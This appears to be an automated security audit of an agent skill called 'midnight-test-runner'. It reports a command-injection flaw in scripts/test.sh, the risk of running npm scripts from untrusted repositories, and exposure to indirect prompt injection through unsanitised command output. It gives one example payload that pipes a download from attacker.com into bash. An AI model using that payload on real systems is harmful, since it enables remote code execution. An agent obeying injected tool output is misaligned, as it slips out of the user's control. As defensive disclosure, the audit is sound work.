midnight-test-runner

Fail

Audited by Gen Agent Trust Hub on Feb 18, 2026

Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The shell script scripts/test.sh contains a critical command injection vulnerability in the way it handles vitest options.
  • Evidence: On line 59, the script executes npm run test -- $VITEST_OPTIONS. The variable $VITEST_OPTIONS is expanded by the shell without double quotes. Because these options are derived directly from user-supplied command-line arguments (captured via $@ after a shift 2), any shell metacharacters such as semicolons, ampersands, or backticks will be interpreted and executed by the shell.
  • Attack Vector: An attacker can gain arbitrary code execution by providing a malicious payload as a trailing argument. For example: bash scripts/test.sh ./contract ignore "; curl http://attacker.com/x | bash".
  • COMMAND_EXECUTION (LOW): The skill performs dynamic command execution by invoking npm run build and npm run test within a user-provided directory.
  • Evidence: Lines 48 and 59 of scripts/test.sh execute scripts defined in the target project's package.json.
  • Risk: This follows a "trusting the project" model. If an agent is tricked into running tests on a malicious repository, the build or test scripts in that repository's package.json will be executed with the agent's privileges.
  • INDIRECT_PROMPT_INJECTION (LOW): The skill processes untrusted data from the local file system and command outputs which could lead to indirect prompt injection.
  • Ingestion points: The CONTRACT_PATH argument, all files within that directory (e.g., package.json), and the standard output/error of the npm commands (file: scripts/test.sh).
  • Boundary markers: Absent. The script captures raw command output and returns it as part of a JSON object without sanitization or clear delimiters to separate it from agent instructions.
  • Capability inventory: The skill can execute arbitrary shell commands via npm, perform directory traversal, and read/write project files.
  • Sanitization: None. The script does not validate the content of the project directory or the resulting test output before presenting it to the agent.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 18, 2026, 09:17 PM